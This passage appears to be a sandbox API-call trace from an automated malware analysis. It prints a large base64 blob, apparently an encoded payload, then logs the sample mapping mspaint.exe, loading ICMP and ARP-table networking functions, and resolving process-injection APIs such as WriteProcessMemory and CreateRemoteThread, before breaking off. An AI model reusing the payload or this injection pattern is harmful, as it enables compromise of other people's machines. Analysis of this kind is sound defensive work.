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", cchString=0x4a704, dwFlags=0x1, pbBinary=0x25e0000, pcbBinary=0x19f43c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x25e0000, pcbBinary=0x19f43c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0122.853] LdrGetDllHandle (in: DllPath=0x0, DllCharacteristics=0x0, DllName="KERNEL32.DLL", DllHandle=0x19ebcc | out: DllHandle=0x19ebcc*=0x74030000) returned 0x0 [0122.853] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x74030000 [0122.853] GetSystemDirectoryA (in: lpBuffer=0x19f044, uSize=0x200 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0122.854] LdrGetDllHandle (in: DllPath=0x0, DllCharacteristics=0x0, DllName="KERNEL32.DLL", DllHandle=0x19ebb0 | out: DllHandle=0x19ebb0*=0x74030000) returned 0x0 [0122.854] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x74030000 [0122.854] CreateFileA (lpFileName="C:\\WINDOWS\\system32sppsvc.exe" (normalized: "c:\\windows\\system32sppsvc.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0122.855] LdrGetDllHandle (in: DllPath=0x0, DllCharacteristics=0x0, DllName="KERNEL32.DLL", DllHandle=0x19ebb0 | out: DllHandle=0x19ebb0*=0x74030000) returned 0x0 [0122.855] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x74030000 [0122.855] CreateFileA (lpFileName="C:\\WINDOWS\\system32\\mspaint.exe" (normalized: "c:\\windows\\system32\\mspaint.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x26c [0122.856] LdrGetDllHandle (in: DllPath=0x0, DllCharacteristics=0x0, DllName="KERNEL32.DLL", DllHandle=0x19ebc4 | out: DllHandle=0x19ebc4*=0x74030000) returned 0x0 [0122.857] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x74030000 [0122.857] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x63b800 [0122.857] LdrGetDllHandle (in: DllPath=0x0, DllCharacteristics=0x0, DllName="KERNEL32.DLL", DllHandle=0x19f2d8 | out: DllHandle=0x19f2d8*=0x74030000) returned 0x0 [0122.857] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77390000 [0122.858] LdrGetDllHandle (in: DllPath=0x0, DllCharacteristics=0x0, DllName="KERNEL32.DLL", DllHandle=0x19f2d8 | out: DllHandle=0x19f2d8*=0x74030000) returned 0x0 [0122.858] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77390000 [0122.859] LdrGetDllHandle (in: DllPath=0x0, DllCharacteristics=0x0, DllName="KERNEL32.DLL", DllHandle=0x19f2d8 | out: DllHandle=0x19f2d8*=0x74030000) returned 0x0 [0122.859] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77390000 [0122.860] LdrGetDllHandle (in: DllPath=0x0, DllCharacteristics=0x0, DllName="KERNEL32.DLL", DllHandle=0x19f330 | out: DllHandle=0x19f330*=0x74030000) returned 0x0 [0122.860] NtCreateSection (in: SectionHandle=0x19f3d0, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x0, SectionPageProtection=0x2, AllocationAttributes=0x1000000, FileHandle=0x26c | out: SectionHandle=0x19f3d0*=0x270) returned 0x0 [0122.938] NtMapViewOfSection (in: SectionHandle=0x270, ProcessHandle=0xffffffff, BaseAddress=0x19f508*=0x30000000, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19f4bc*=0x171000, InheritDisposition=0x2, AllocationType=0x0, AccessProtection=0x2 | out: BaseAddress=0x19f508*=0x30000000, SectionOffset=0x0, ViewSize=0x19f4bc*=0x171000) returned 0x40000003 [0122.938] VirtualProtect (in: lpAddress=0x30000000, dwSize=0x171000, flNewProtect=0x4, lpflOldProtect=0x19f360 | out: lpflOldProtect=0x19f360*=0x2) returned 1 [0123.774] LoadLibraryA (lpLibFileName="IPHLPAPI.DLL") returned 0x73a30000 [0123.915] GetProcAddress (hModule=0x73a30000, lpProcName="IcmpCloseHandle") returned 0x73a3dfa0 [0123.915] GetProcAddress (hModule=0x73a30000, lpProcName="IcmpCreateFile") returned 0x73a50590 [0123.915] GetProcAddress (hModule=0x73a30000, lpProcName="GetAdaptersAddresses") returned 0x73a36190 [0123.915] GetProcAddress (hModule=0x73a30000, lpProcName="IcmpSendEcho") returned 0x73a50ab0 [0123.915] GetProcAddress (hModule=0x73a30000, lpProcName="GetIpNetTable") returned 0x73a427d0 [0123.915] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x74030000 [0123.915] GetProcAddress (hModule=0x74030000, lpProcName="SetLastError") returned 0x74044f00 [0123.916] GetProcAddress (hModule=0x74030000, lpProcName="WriteProcessMemory") returned 0x74046b70 [0123.916] GetProcAddress (hModule=0x74030000, lpProcName="WaitForMultipleObjects") returned 0x7409ec80 [0123.916] GetProcAddress (hModule=0x74030000, lpProcName="Sleep") returned 0x74046760 [0123.916] GetProcAddress (hModule=0x74030000, lpProcName="GetLogicalDrives") returned 0x74040d20 [0123.916] GetProcAddress (hModule=0x74030000, lpProcName="SetFilePointer") returned 0x7409f120 [0123.916] GetProcAddress (hModule=0x74030000, lpProcName="CloseHandle") returned 0x7409eab0 [0123.916] GetProcAddress (hModule=0x74030000, lpProcName="WinExec") returned 0x74082b00 [0123.916] GetProcAddress (hModule=0x74030000, lpProcName="GetTickCount") returned 0x7409dd50 [0123.917] GetProcAddress (hModule=0x74030000, lpProcName="GetLastError") returned 0x74045010 [0123.917] GetProcAddress (hModule=0x74030000, lpProcName="LoadLibraryA") returned 0x74045a80 [0123.917] GetProcAddress (hModule=0x74030000, lpProcName="GetModuleFileNameW") returned 0x74045090 [0123.917] GetProcAddress (hModule=0x74030000, lpProcName="GetModuleHandleA") returned 0x740450b0 [0123.917] GetProcAddress (hModule=0x74030000, lpProcName="GetCommandLineW") returned 0x74044cc0 [0123.917] GetProcAddress (hModule=0x74030000, lpProcName="GetTempPathW") returned 0x7409eff0 [0123.917] GetProcAddress (hModule=0x74030000, lpProcName="GetWindowsDirectoryW") returned 0x74045730 [0123.917] GetProcAddress (hModule=0x74030000, lpProcName="CreateFileW") returned 0x7409ed10 [0123.918] GetProcAddress (hModule=0x74030000, lpProcName="DeleteFileW") returned 0x7409ed40 [0123.918] GetProcAddress (hModule=0x74030000, lpProcName="CopyFileW") returned 0x7409f3b0 [0123.918] GetProcAddress (hModule=0x74030000, lpProcName="GetVersionExW") returned 0x740456f0 [0123.918] GetProcAddress (hModule=0x74030000, lpProcName="CreateToolhelp32Snapshot") returned 0x7407edc0 [0123.918] GetProcAddress (hModule=0x74030000, lpProcName="Process32FirstW") returned 0x7407f750 [0123.918] GetProcAddress (hModule=0x74030000, lpProcName="Process32NextW") returned 0x7407f8f0 [0123.918] GetProcAddress (hModule=0x74030000, lpProcName="GetCurrentThread") returned 0x74048810 [0123.918] GetProcAddress (hModule=0x74030000, lpProcName="CreateRemoteThread") returned 0x74044670 [0123.918] GetProcAddress (hModule=0x74030000, lpProcName="CreateThread") returned 0x740446b0 [0123.918] GetProcAddress (hModule=0x74030000, lpProcName="ExitProcess") returned 0x74043cb0 [0123.919] GetProcAddress (hModule=0x74030000, lpProcName="GetCurrentProcess") returned 0x7409ea10 [0123.919] GetProcAddress (hModule=0x74030000, lpProcName="OpenProcess") returned 0x74045cc0 [0123.919] GetProcAddress (hModule=0x74030000, lpProcName="GetProcessHeap") returned 0x740451f0 [0123.919] GetProcAddress (hModule=0x74030000, lpProcName="HeapFree") returned 0x740457f0 [0123.919] GetProcAddress (hModule=0x74030000, lpProcName="HeapAlloc") returned 0x773d2dc0 [0123.919] GetProcAddress (hModule=0x74030000, lpProcName="VirtualFreeEx") returned 0x740469f0 [0123.919] GetProcAddress (hModule=0x74030000, lpProcName="VirtualAllocEx") returned 0x74046990 [0123.919] GetProcAddress (hModule=0x74030000, lpProcName="VirtualFree") returned 0x740469d0 [0123.919] GetProcAddress (hModule=0x74030000, lpProcName="VirtualAlloc") returned 0x74046970 [0123.920] GetProcAddress (hModule=0x74030000, lpProcName="LocalFree") returned 0x74045b40 [0123.920] GetProcAddress (hModule=0x74030000, lpProcName="GlobalFree") returned 0x74041ee0 [0123.920] GetProcAddress (hModule=0x74030000, lpProcName="GlobalAlloc") returned 0x74045750 [0123.920] GetProcAddress (hModule=0x74030000, lpProcName="GetProcAddress") returned 0x740451b0 [0123.920] GetProcAddress (hModule=0x74030000, 